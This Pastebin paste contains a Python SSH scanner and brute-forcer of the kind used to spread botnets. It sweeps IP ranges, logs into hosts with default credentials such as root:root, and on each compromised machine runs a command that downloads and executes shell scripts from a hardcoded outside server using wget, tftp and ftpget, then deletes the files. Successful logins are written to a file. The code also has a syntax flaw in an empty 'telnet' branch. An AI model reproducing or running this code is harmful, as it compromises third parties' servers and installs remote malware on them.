API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 26th, 2018
167
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.16 KB | None | 0 0
raw download clone embed print report
  1. import threading, paramiko, random, socket, time, sys
  2.  
  3. paramiko.util.log_to_file("/dev/null")
  4.  
  5.  
  6. blacklisted = ["127.0","10.0","192.168"]
  7.  
  8. passwords = ["admin:1234"]
  9.  
  10. if sys.argv[4] == "root":
  11. passwords = ["root:root"]
  12. if sys.argv[4] == "guest":
  13. passwords = ["guest:guest"]
  14. if sys.argv[4] == "telnet":
  15.  
  16. if len(sys.argv) < 4 :
  17. print("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
  18. sys.exit()
  19.  
  20. print """\n\x1b[0;37m******************************
  21. * \x1b[0;31mSCANNER STARTING\x1b[0;37m *
  22. ******************************\x1b[0m"""
  23.  
  24. def sshscanner(ip):
  25. global passwords
  26. try:
  27. thisipisbad='no'
  28. for badip in blacklisted:
  29. if badip in ip:
  30. thisipisbad='yes'
  31. if thisipisbad=='yes':
  32. sys.exit()
  33. username='root'
  34. password="0"
  35. port = 22
  36. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  37. s.settimeout(3)
  38. s.connect((ip, port))
  39. data = str(s.recv(1024))
  40. if "SSH" in data:
  41. print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
  42. elif "ssh" in data:
  43. print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
  44. else:
  45. sys.exit()
  46. s.close()
  47. ssh = paramiko.SSHClient()
  48. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  49. dobreak=False
  50. for passwd in passwords:
  51. if ":n/a" in passwd:
  52. password=""
  53. else:
  54. password=passwd.split(":")[1]
  55. if "n/a:" in passwd:
  56. username=""
  57. else:
  58. username=passwd.split(":")[0]
  59. try:
  60. ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  61. break
  62. except:
  63. pass
  64. badserver=True
  65. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  66. output = stdout.read()
  67. if "inet addr" in output:
  68. badserver=False
  69. websites = [ ]
  70. if badserver == False:
  71. print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
  72. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.89.225.37/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 159.89.225.37 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 159.89.225.37; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.89.225.37 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  73. vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
  74. time.sleep(12)
  75. ssh.close()
  76. except Exception as e:
  77. pass
  78.  
  79.  
  80. if sys.argv[2] == "LUCKY":
  81. ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
  82. randomrange = random.choice(ranges)
  83. startrng = randomrange.split("/")[0]
  84. endrng = randomrange.split("/")[1]
  85.  
  86. if sys.argv[2] != "LUCKY":
  87. a = int(sys.argv[2].split(".")[0])
  88. b = int(sys.argv[2].split(".")[1])
  89. c = int(sys.argv[2].split(".")[2])
  90. d = int(sys.argv[2].split(".")[3])
  91. else:
  92. a = int(startrng.split(".")[0])
  93. b = int(startrng.split(".")[1])
  94. c = int(startrng.split(".")[2])
  95. d = int(startrng.split(".")[3])
  96. x = 0
  97.  
  98. while(True):
  99. try:
  100.  
  101. if sys.argv[2] != "LUCKY":
  102. endaddr = sys.argv[3]
  103. else:
  104. endaddr = endrng
  105.  
  106. d += 1
  107.  
  108. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  109.  
  110. if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
  111. if sys.argv[2] == "LUCKY":
  112. randomrange = random.choice(ranges)
  113. startrng = randomrange.split("/")[0]
  114. endrng = randomrange.split("/")[1]
  115. a = int(startrng.split(".")[0])
  116. b = int(startrng.split(".")[1])
  117. c = int(startrng.split(".")[2])
  118. d = int(startrng.split(".")[3])
  119. else:
  120. break
  121.  
  122. if d > 255:
  123. c += 1
  124. d = 0
  125.  
  126. if c > 255:
  127. b += 1
  128. c = 0
  129.  
  130. if b > 255:
  131. a += 1
  132. b = 0
  133.  
  134. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  135.  
  136. if ipaddr == endaddr:
  137. if sys.argv[2] == "LUCKY":
  138. randomrange = random.choice(ranges)
  139. startrng = randomrange.split("/")[0]
  140. endrng = randomrange.split("/")[1]
  141. a = int(startrng.split(".")[0])
  142. b = int(startrng.split(".")[1])
  143. c = int(startrng.split(".")[2])
  144. d = int(startrng.split(".")[3])
  145. else:
  146. break
  147.  
  148. if x > 500:
  149. time.sleep(1)
  150. x = 0
  151.  
  152. t = threading.Thread(target=sshscanner, args=(ipaddr,))
  153. t.start()
  154.  
  155. except Exception as e:
  156. pass
  157.  
  158. print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!